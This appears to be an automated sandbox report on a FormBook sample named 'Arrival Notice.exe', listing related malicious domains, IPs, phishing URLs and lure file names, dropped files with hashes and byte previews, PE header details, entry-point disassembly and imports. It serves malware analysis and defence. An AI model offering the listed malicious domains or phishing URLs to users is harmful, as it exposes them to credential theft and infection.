www.dmtxwuatbz.cc | Swift Copy #U00a362,271.03.Pdf.exe | malicious | FormBook | 172.67.210.102
www.dmtxwuatbz.cc | PO-104678522.exe | malicious | FormBook | 172.67.210.102
www.dmtxwuatbz.cc | NEW ORDER-RFQ#10112023Q4.exe | malicious | FormBook | 104.21.45.56
www.dmtxwuatbz.cc | NEW ORDER 75647839384.exe | malicious | FormBook | 104.21.45.56
www.xn--matfrmn-jxa4m.se | shipping documents.exe | malicious | FormBook | 194.9.94.85
www.xn--matfrmn-jxa4m.se | MV Sunshine, ORDER.exe | malicious | FormBook | 194.9.94.85
www.xn--matfrmn-jxa4m.se | PAYROLL SUMMARY _pdf.exe | malicious | FormBook | 194.9.94.85
www.xn--matfrmn-jxa4m.se | docs_pdf.exe | malicious | FormBook | 194.9.94.85
www.xn--matfrmn-jxa4m.se | TOgpmvvWoj.exe | malicious | FormBook | 194.9.94.85
www.xn--matfrmn-jxa4m.se | Attendance list.exe | malicious | FormBook | 194.9.94.85
www.xn--matfrmn-jxa4m.se | Navana Pharmaceuticals PLC.pdf.exe | malicious | FormBook | 194.9.94.85
www.xn--matfrmn-jxa4m.se | D7KV2Z73zC.rtf | malicious | FormBook | 194.9.94.85
www.xn--matfrmn-jxa4m.se | Scan Doc.docx.doc | malicious | FormBook | 194.9.94.85
www.xn--matfrmn-jxa4m.se | BASF Purchase Order.doc | malicious | FormBook | 194.9.94.86
www.catherineviskadi.com | shipping documents.exe | malicious | FormBook | 217.160.0.106
www.catherineviskadi.com | MV Sunshine, ORDER.exe | malicious | FormBook | 217.160.0.106
www.catherineviskadi.com | PAYROLL SUMMARY _pdf.exe | malicious | FormBook | 217.160.0.106
www.catherineviskadi.com | docs_pdf.exe | malicious | FormBook | 217.160.0.106
www.catherineviskadi.com | TOgpmvvWoj.exe | malicious | FormBook | 217.160.0.106
www.catherineviskadi.com | Attendance list.exe | malicious | FormBook | 217.160.0.106
Match | Associated Sample Name / URL | Detection | Threat Name | Context
CLOUDFLARENETUS | file.exe | malicious | Babadeda | 172.64.41.3
CLOUDFLARENETUS | http://pancakeu.top/ | malicious | Unknown | 104.17.25.14
CLOUDFLARENETUS | http://cobsaiprologue.gitbook.io/us | malicious | Unknown | 104.18.25.61
CLOUDFLARENETUS | https://vpjjioou7.indylatinawrds.com:8443/impact?impact=d..**@c.*.com | malicious | HTMLPhisher | 104.17.25.14
CLOUDFLARENETUS | https://13yxw.com/ | malicious | Unknown | 104.21.56.75
CLOUDFLARENETUS | https://help-mettamskexteiin.gitbook.io/ | malicious | Unknown | 104.18.25.61
CLOUDFLARENETUS | https://xybxguyw7.indylatinawrds.com:8443/impact?impact=b..*@t....**.com | malicious | HTMLPhisher | 104.17.25.14
CLOUDFLARENETUS | https://home-start-trezor-io.github.io/ | malicious | Unknown | 104.17.25.14
CLOUDFLARENETUS | http://kcrekanlogien.gitbook.io/us | malicious | Unknown | 104.18.25.61
CLOUDFLARENETUS | https://start-trenzor.webflow.io/ | malicious | Unknown | 104.18.28.203
DOMAINTECHNIKAT | shipping documents.exe | malicious | FormBook | 213.145.228.16
DOMAINTECHNIKAT | MV Sunshine, ORDER.exe | malicious | FormBook | 213.145.228.16
DOMAINTECHNIKAT | PAYROLL SUMMARY _pdf.exe | malicious | FormBook | 213.145.228.16
DOMAINTECHNIKAT | LisectAVT_2403002A_87.exe | malicious | FormBook | 213.145.228.16
DOMAINTECHNIKAT | bJrO2iUerN.elf | malicious | Unknown | 213.145.228.16
DOMAINTECHNIKAT | TOgpmvvWoj.exe | malicious | FormBook | 213.145.228.16
DOMAINTECHNIKAT | Attendance list.exe | malicious | FormBook | 213.145.228.16
DOMAINTECHNIKAT | Navana Pharmaceuticals PLC.pdf.exe | malicious | FormBook | 213.145.228.16
DOMAINTECHNIKAT | Swift Message.pdf.exe | malicious | FormBook | 213.145.228.16
DOMAINTECHNIKAT | 1LZvA2cEfV.exe | malicious | FormBook, PureLog Stealer | 213.145.228.16
VPSQUANUS | shipping documents.exe | malicious | FormBook | 23.251.54.212
VPSQUANUS | MV Sunshine, ORDER.exe | malicious | FormBook | 23.251.54.212
VPSQUANUS | PAYROLL SUMMARY _pdf.exe | malicious | FormBook | 23.251.54.212
VPSQUANUS | v9.exe | malicious | Unknown | 154.222.224.99
VPSQUANUS | 1.exe | malicious | Unknown | 154.222.224.99
VPSQUANUS | v9.exe | malicious | Unknown | 154.222.224.99
VPSQUANUS | bot.x86.elf | malicious | Mirai, Okiru | 69.165.74.76
VPSQUANUS | bot.m68k.elf | malicious | Mirai, Okiru | 69.165.74.76
VPSQUANUS | bot.arm7.elf | malicious | Mirai, Okiru | 69.165.74.76
VPSQUANUS | bot.ppc.elf | malicious | Mirai, Okiru | 69.165.74.76
LOOPIASE | shipping documents.exe | malicious | FormBook | 194.9.94.85
LOOPIASE | MV Sunshine, ORDER.exe | malicious | FormBook | 194.9.94.85
LOOPIASE | PAYROLL SUMMARY _pdf.exe | malicious | FormBook | 194.9.94.85
LOOPIASE | http://tok2np0cklt.top/ | malicious | Unknown | 194.9.94.85
LOOPIASE | docs_pdf.exe | malicious | FormBook | 194.9.94.85
LOOPIASE | TOgpmvvWoj.exe | malicious | FormBook | 194.9.94.85
LOOPIASE | Attendance list.exe | malicious | FormBook | 194.9.94.85
LOOPIASE | Navana Pharmaceuticals PLC.pdf.exe | malicious | FormBook | 194.9.94.85
LOOPIASE | Arrival Notice.bat.exe | malicious | FormBook | 194.9.94.86
LOOPIASE | Arrival Notice.bat.exe | malicious | FormBook | 194.9.94.85
                Process:C:\Windows\SysWOW64\clip.exe
                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                Category:dropped
                Size (bytes):114688
                Entropy (8bit):0.9746603542602881
                Encrypted:false
                SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                MD5:780853CDDEAEE8DE70F28A4B255A600B
                SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                Malicious:false
                Reputation:high, very likely benign file
                Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                Process:C:\Users\user\Desktop\Arrival Notice.exe
                File Type:data
                Category:dropped
                Size (bytes):270848
                Entropy (8bit):7.993180127687542
                Encrypted:true
                SSDEEP:6144:l84/Cc77f3IeJvt5Z6XpOMdLenbBpDJkLpdVUHBrbTAE:lJ/B773IeJvYIsiNpDCLXMbTAE
                MD5:E290D6547A68989D0EF23484354D3075
                SHA1:3751012B6048A0E623FBEDD0A8154F31D5502581
                SHA-256:9EC3490185591431762AAAEF3F1FC896DBE143DD57D007408BEBE43083E2C41F
                SHA-512:1C5AC6DF8211024CBD5F9B5D7DFA110C43AC1CF3A6E5129D075529E9757E3BAC87CCD136DF6053C3FB20C19E1426640EB9F065997D02711B727B8B0044E9490E
                Malicious:false
                Reputation:low
                Preview:.....HNIXh..<...v.S[..p3:...4NNJBSXHNIX02Z5M4NNJBSXHNIX02Z.M4N@U.]X.G.y.3..l`&'9b#*');9].9T#Z!:j 6x:;'xY\zq.gn#%&6vECC|02Z5M4N7KK.e().ePU..-S.T..b().B....-S.T..d()..YQ2.-S.NJBSXHNI.u2ZyL5N_.z3XHNIX02Z.M6OEKISXXJIX02Z5M4Nn_BSXXNIX.6Z5MtNNZBSXJNI^02Z5M4NHJBSXHNIX.6Z5O4NNJBSZH..X0"Z5]4NNJRSXXNIX02Z%M4NNJBSXHNIX02Z5M4NNJBSXHNIX02Z5M4NNJBSXHNIX02Z5M4NNJBSXHNIX02Z5M4NNJBSXHNIX02Z5M4NNJBSXHNIX02Z5M4NNJBSXHNIX02Z5M4NNJBSXHNIX02Z5M4N`>'+,HNI.?6Z5]4NNZFSXXNIX02Z5M4NNJBSxHN)X02Z5M4NNJBSXHNIX02Z5M4NNJBSXHNIX02Z5M4NNJBSXHNIX02Z5M4NNJBSXHNIX02Z5M4NNJBSXHNIX02Z5M4NNJBSXHNIX02Z5M4NNJBSXHNIX02Z5M4NNJBSXHNIX02Z5M4NNJBSXHNIX02Z5M4NNJBSXHNIX02Z5M4NNJBSXHNIX02Z5M4NNJBSXHNIX02Z5M4NNJBSXHNIX02Z5M4NNJBSXHNIX02Z5M4NNJBSXHNIX02Z5M4NNJBSXHNIX02Z5M4NNJBSXHNIX02Z5M4NNJBSXHNIX02Z5M4NNJBSXHNIX02Z5M4NNJBSXHNIX02Z5M4NNJBSXHNIX02Z5M4NNJBSXHNIX02Z5M4NNJBSXHNIX02Z5M4NNJBSXHNIX02Z5M4NNJBSXHNIX02Z5M4NNJBSXHNIX02Z5M4NNJBSXHNIX02Z5M4NNJBSXHNIX02Z5M4NNJBSXHNIX02Z5M4NNJBSXHNIX02Z5M4NNJBSXHNIX02Z5M4NNJBSXHNIX02Z5M4NNJBSXHNI
                Process:C:\Users\user\Desktop\Arrival Notice.exe
                File Type:data
                Category:dropped
                Size (bytes):43612
                Entropy (8bit):7.824936518463832
                Encrypted:false
                SSDEEP:768:NfNqB1xrmuToYNiZq5Zw+sQ96Ia/RbfVxQ5jWi+nOsV9Hurj2R7xK/u9lERB7Oug:ns1ToqiZiu/Q63tQ9+OgOrCa/uto5c2w
                MD5:2E7D19756B26D646A39A4C7C0548E1B1
                SHA1:B6D962F6B62765D56554F6320DF0ED06AE76B946
                SHA-256:0D412113E9DEF378A9BACA33142FBB0B86F5F4FB74E6394349E05A2B98819054
                SHA-512:19F5FC45E8FCE103CA42C00E1BDC701B2DC4218D9943A22521031EECC986DFEB4F33A81017BB17F1EC7440E3F4AE08C34D0A1C5E05401643265600395AD8F0C5
                Malicious:false
                Reputation:low
                Preview:EA06..P...+.y.Bg5.L.y..6.S..Z4.gK..*.9..m5.M.t...6..fs...eC..*.9.Fg0.L..Y..3.V........+S9.Nm2...T......L.....3.T&s.T.sI......>g4.M.UI..3.R.sZ4.aK..(S9.X...<)39.P..Rfs.T.iH.M+S9.bg6.M.U.....L.Up..3.Q.s.P..S...9.:g8.L.5y..3..fs...6.-'...6...jx.j.....Y..3.U.....iB...3i..l..N@..L.kM..)....AL.r.....f..NhS9.fm4.L..9.....j39.Jm3..Q@&E.....)...D....@B...8..K.(..g3.L.`'.H......T.}.T.C..LV..Y.....~..I.Bg0..6T`.8.x.L...%6g8...UI..3..s*D.eP.Li.9...B.6.@....+ .,..^.@y...g9.L...3.........U.....Sfsj0..Q...6...l..Tfs. ..h...@G......'.j..%T..*3i......$.......>U...U.. ...3.R.s....}.l..!fgT...si.8..UI.....(`&P.qN.L.....6..........S@$ ... ...3....4...Y..6.|.u..:l.xM..i.4..........KR.........D .@.IJ..@.@.....%....6.U..fh...6...@....V@:...T.s.2.....i.@.r...S@!..l.... -...U.L.@....J.....A....9..)P.M(.:,....!.....D..U)...|...GJH..D.....E.R....0.X...30...6.Q.5j ..J....6....Z .t..@.....4...p...L........E@.e0.......,r...........G.j.....a.....+ ....lT....%..(.i.Vm1.M).$
                Process:C:\Users\user\Desktop\Arrival Notice.exe
                File Type:data
                Category:dropped
                Size (bytes):270848
                Entropy (8bit):7.993180127687542
                Encrypted:true
                SSDEEP:6144:l84/Cc77f3IeJvt5Z6XpOMdLenbBpDJkLpdVUHBrbTAE:lJ/B773IeJvYIsiNpDCLXMbTAE
                MD5:E290D6547A68989D0EF23484354D3075
                SHA1:3751012B6048A0E623FBEDD0A8154F31D5502581
                SHA-256:9EC3490185591431762AAAEF3F1FC896DBE143DD57D007408BEBE43083E2C41F
                SHA-512:1C5AC6DF8211024CBD5F9B5D7DFA110C43AC1CF3A6E5129D075529E9757E3BAC87CCD136DF6053C3FB20C19E1426640EB9F065997D02711B727B8B0044E9490E
                Malicious:false
                Reputation:low
                Preview:.....HNIXh..<...v.S[..p3:...4NNJBSXHNIX02Z5M4NNJBSXHNIX02Z.M4N@U.]X.G.y.3..l`&'9b#*');9].9T#Z!:j 6x:;'xY\zq.gn#%&6vECC|02Z5M4N7KK.e().ePU..-S.T..b().B....-S.T..d()..YQ2.-S.NJBSXHNI.u2ZyL5N_.z3XHNIX02Z.M6OEKISXXJIX02Z5M4Nn_BSXXNIX.6Z5MtNNZBSXJNI^02Z5M4NHJBSXHNIX.6Z5O4NNJBSZH..X0"Z5]4NNJRSXXNIX02Z%M4NNJBSXHNIX02Z5M4NNJBSXHNIX02Z5M4NNJBSXHNIX02Z5M4NNJBSXHNIX02Z5M4NNJBSXHNIX02Z5M4NNJBSXHNIX02Z5M4NNJBSXHNIX02Z5M4NNJBSXHNIX02Z5M4N`>'+,HNI.?6Z5]4NNZFSXXNIX02Z5M4NNJBSxHN)X02Z5M4NNJBSXHNIX02Z5M4NNJBSXHNIX02Z5M4NNJBSXHNIX02Z5M4NNJBSXHNIX02Z5M4NNJBSXHNIX02Z5M4NNJBSXHNIX02Z5M4NNJBSXHNIX02Z5M4NNJBSXHNIX02Z5M4NNJBSXHNIX02Z5M4NNJBSXHNIX02Z5M4NNJBSXHNIX02Z5M4NNJBSXHNIX02Z5M4NNJBSXHNIX02Z5M4NNJBSXHNIX02Z5M4NNJBSXHNIX02Z5M4NNJBSXHNIX02Z5M4NNJBSXHNIX02Z5M4NNJBSXHNIX02Z5M4NNJBSXHNIX02Z5M4NNJBSXHNIX02Z5M4NNJBSXHNIX02Z5M4NNJBSXHNIX02Z5M4NNJBSXHNIX02Z5M4NNJBSXHNIX02Z5M4NNJBSXHNIX02Z5M4NNJBSXHNIX02Z5M4NNJBSXHNIX02Z5M4NNJBSXHNIX02Z5M4NNJBSXHNIX02Z5M4NNJBSXHNIX02Z5M4NNJBSXHNIX02Z5M4NNJBSXHNIX02Z5M4NNJBSXHNI
                Process:C:\Users\user\Desktop\Arrival Notice.exe
                File Type:ASCII text, with very long lines (65536), with no line terminators
                Category:dropped
                Size (bytes):86022
                Entropy (8bit):4.179065701160929
                Encrypted:false
                SSDEEP:1536:R+KzPMCgCEOpvfkgHvtlfWNmZ1iW6AUiZ:YK4RsRkgPjfiZmZ
                MD5:FB8640FC4CC82974E33E333DBEE4B02B
                SHA1:16F16F500F389E22C29592094F742EB2BCE5C075
                SHA-256:7BE58C7C4644155DB0F9758FEA273185D711D9B3E865B2673B6A9BE43F144408
                SHA-512:41464BC082DE350A6C4370DC2EBFFA1425FEDA257461E0AA46AEC67A7D0EBDCF3BCE79427FDFE743D8802806A0B6248BE5874EDEE75831BFC9CB754A03D7C671
                Malicious:false
                Reputation:low
                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                Entropy (8bit):7.174151192602831
                TrID:
                • Win32 Executable (generic) a (10002005/4) 99.96%
                • Generic Win/DOS Executable (2004/3) 0.02%
                • DOS Executable Generic (2002/1) 0.02%
                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                File name:Arrival Notice.exe
                File size:1'287'680 bytes
                MD5:f94ffbea567a61ade8409b8a854d6562
                SHA1:cd0e9b9c21111af31bb59d416e6edf49eb8aaf3e
                SHA256:f0cd4c3441a54c8b9f0d7aa5ba5066014d8eaefe9ddf6b87906354e043b627b5
                SHA512:f3fc585f537e67da41188da213fcdc0bdf8098bf2c3d8d767ae8a1849ebc1d179401951b2e7f6ead4097c8c70b7587b7788a978b18edee1033b59ab3badd37aa
                SSDEEP:24576:fqDEvCTbMWu7rQYlBQcBiT6rprG8aCgvQtoiS3OZ5Bk1Bw:fTvC/MTQYxsWR7aCAwoiS3OZc1
                TLSH:E955C00277C1C022FF9B92334B5AF6515BBC69260523E61F13A81DB9BE701B1563E7A3
                File Content Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......................j:......j:..C...j:......@.*...............................n.......~.............{.......{.......{.........z....
                Icon Hash:aaf3e3e3938382a0
                Entrypoint:0x420577
                Entrypoint Section:.text
                Digitally signed:false
                Imagebase:0x400000
                Subsystem:windows gui
                Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                Time Stamp:0x66C27845 [Sun Aug 18 22:40:05 2024 UTC]
                TLS Callbacks:
                CLR (.Net) Version:
                OS Version Major:5
                OS Version Minor:1
                File Version Major:5
                File Version Minor:1
                Subsystem Version Major:5
                Subsystem Version Minor:1
                Import Hash:948cc502fe9226992dce9417f952fce3
                Instruction
                call 00007F4968EFB7E3h
                jmp 00007F4968EFB0EFh
                push ebp
                mov ebp, esp
                push esi
                push dword ptr [ebp+08h]
                mov esi, ecx
                call 00007F4968EFB2CDh
                mov dword ptr [esi], 0049FDF0h
                mov eax, esi
                pop esi
                pop ebp
                retn 0004h
                and dword ptr [ecx+04h], 00000000h
                mov eax, ecx
                and dword ptr [ecx+08h], 00000000h
                mov dword ptr [ecx+04h], 0049FDF8h
                mov dword ptr [ecx], 0049FDF0h
                ret
                push ebp
                mov ebp, esp
                push esi
                push dword ptr [ebp+08h]
                mov esi, ecx
                call 00007F4968EFB29Ah
                mov dword ptr [esi], 0049FE0Ch
                mov eax, esi
                pop esi
                pop ebp
                retn 0004h
                and dword ptr [ecx+04h], 00000000h
                mov eax, ecx
                and dword ptr [ecx+08h], 00000000h
                mov dword ptr [ecx+04h], 0049FE14h
                mov dword ptr [ecx], 0049FE0Ch
                ret
                push ebp
                mov ebp, esp
                push esi
                mov esi, ecx
                lea eax, dword ptr [esi+04h]
                mov dword ptr [esi], 0049FDD0h
                and dword ptr [eax], 00000000h
                and dword ptr [eax+04h], 00000000h
                push eax
                mov eax, dword ptr [ebp+08h]
                add eax, 04h
                push eax
                call 00007F4968EFDE8Dh
                pop ecx
                pop ecx
                mov eax, esi
                pop esi
                pop ebp
                retn 0004h
                lea eax, dword ptr [ecx+04h]
                mov dword ptr [ecx], 0049FDD0h
                push eax
                call 00007F4968EFDED8h
                pop ecx
                ret
                push ebp
                mov ebp, esp
                push esi
                mov esi, ecx
                lea eax, dword ptr [esi+04h]
                mov dword ptr [esi], 0049FDD0h
                push eax
                call 00007F4968EFDEC1h
                test byte ptr [ebp+08h], 00000001h
                pop ecx
                Programming Language:
                • [ C ] VS2008 SP1 build 30729
                • [IMP] VS2008 SP1 build 30729
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xc8e64 | 0x17c | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xd4000 | 0x63af8 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x138000 | 0x7594 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0xb0ff0 | 0x1c | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0xc3400 | 0x18 | .rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0xb1010 | 0x40 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x9c000 | 0x894 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x9ab1d | 0x9ac00 | 0a1473f3064dcbc32ef93c5c8a90f3a6 | False | 0.565500681542811 | data | 6.668273581389308 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x9c000 | 0x2fb82 | 0x2fc00 | c9cf2468b60bf4f80f136ed54b3989fb | False | 0.35289185209424084 | data | 5.691811547483722 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0xcc000 | 0x706c | 0x4800 | 53b9025d545d65e23295e30afdbd16d9 | False | 0.04356553819444445 | DOS executable (block device driver @\273\) | 0.5846666986982398 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0xd4000 | 0x63af8 | 0x63c00 | 3b124fc89a60797b0e022e2a61b412d3 | False | 0.933858082706767 | data | 7.90825595854727 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x138000 | 0x7594 | 0x7600 | c68ee8931a32d45eb82dc450ee40efc3 | False | 0.7628111758474576 | data | 6.7972128181359786 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0xd45a8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.7466216216216216
RT_ICON | 0xd46d0 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors | English | Great Britain | 0.3277027027027027
RT_ICON | 0xd47f8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.3885135135135135
RT_ICON | 0xd4920 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 0 | English | Great Britain | 0.3333333333333333
RT_ICON | 0xd4c08 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 0 | English | Great Britain | 0.5
RT_ICON | 0xd4d30 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | English | Great Britain | 0.2835820895522388
RT_ICON | 0xd5bd8 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | English | Great Britain | 0.37906137184115524
RT_ICON | 0xd6480 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | English | Great Britain | 0.23699421965317918
RT_ICON | 0xd69e8 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | English | Great Britain | 0.13858921161825727
RT_ICON | 0xd8f90 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | English | Great Britain | 0.25070356472795496
RT_ICON | 0xda038 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | English | Great Britain | 0.3173758865248227
RT_MENU | 0xda4a0 | 0x50 | data | English | Great Britain | 0.9
RT_STRING | 0xda4f0 | 0x594 | data | English | Great Britain | 0.3333333333333333
RT_STRING | 0xdaa84 | 0x68a | data | English | Great Britain | 0.2735961768219833
RT_STRING | 0xdb110 | 0x490 | data | English | Great Britain | 0.3715753424657534
RT_STRING | 0xdb5a0 | 0x5fc | data | English | Great Britain | 0.3087467362924282
RT_STRING | 0xdbb9c | 0x65c | data | English | Great Britain | 0.34336609336609336
RT_STRING | 0xdc1f8 | 0x466 | data | English | Great Britain | 0.3605683836589698
RT_STRING | 0xdc660 | 0x158 | Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0 | English | Great Britain | 0.502906976744186
RT_RCDATA | 0xdc7b8 | 0x5adc0 | data | | | 1.0003251289767843
RT_GROUP_ICON | 0x137578 | 0x76 | data | English | Great Britain | 0.6610169491525424
RT_GROUP_ICON | 0x1375f0 | 0x14 | data | English | Great Britain | 1.25
RT_GROUP_ICON | 0x137604 | 0x14 | data | English | Great Britain | 1.15
RT_GROUP_ICON | 0x137618 | 0x14 | data | English | Great Britain | 1.25
RT_VERSION | 0x13762c | 0xdc | data | English | Great Britain | 0.6181818181818182
RT_MANIFEST | 0x137708 | 0x3ef | ASCII text, with CRLF line terminators | English | Great Britain | 0.5074478649453823
DLL | Import
WSOCK32.dll | gethostbyname, recv, send, socket, inet_ntoa, setsockopt, ntohs, WSACleanup, WSAStartup, sendto, htons, __WSAFDIsSet, select, accept, listen, bind, inet_addr, ioctlsocket, recvfrom, WSAGetLastError, closesocket, gethostname, connect
VERSION.dll | GetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
WINMM.dll | timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll | ImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
MPR.dll | WNetGetConnectionW, WNetCancelConnection2W, WNetUseConnectionW, WNetAddConnection2W
WININET.dll | HttpOpenRequestW, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, InternetConnectW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetQueryDataAvailable
PSAPI.DLL | GetProcessMemoryInfo
IPHLPAPI.DLL | IcmpSendEcho, IcmpCloseHandle, IcmpCreateFile
USERENV.dll | DestroyEnvironmentBlock, LoadUserProfileW, CreateEnvironmentBlock, UnloadUserProfile
UxTheme.dll | IsThemeActive
KERNEL32.dll | DuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetShortPathNameW, DeleteFileW, IsDebuggerPresent, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, LoadResource, LockResource, SizeofResource, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, LoadLibraryW, GetLocalTime, CompareStringW, GetCurrentThread, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, VirtualAlloc, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, ResetEvent, WaitForSingleObjectEx, IsProcessorFeaturePresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, CloseHandle, GetFullPathNameW, GetStartupInfoW, GetSystemTimeAsFileTime, InitializeSListHead, RtlUnwind, SetLastError, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, ResumeThread, FreeLibraryAndExitThread, GetACP, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetStringTypeW, GetFileType, SetStdHandle, GetConsoleCP, GetConsoleMode, ReadConsoleW, GetTimeZoneInformation, FindFirstFileExW, IsValidCodePage, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableA, SetCurrentDirectoryW, FindNextFileW, WriteConsoleW
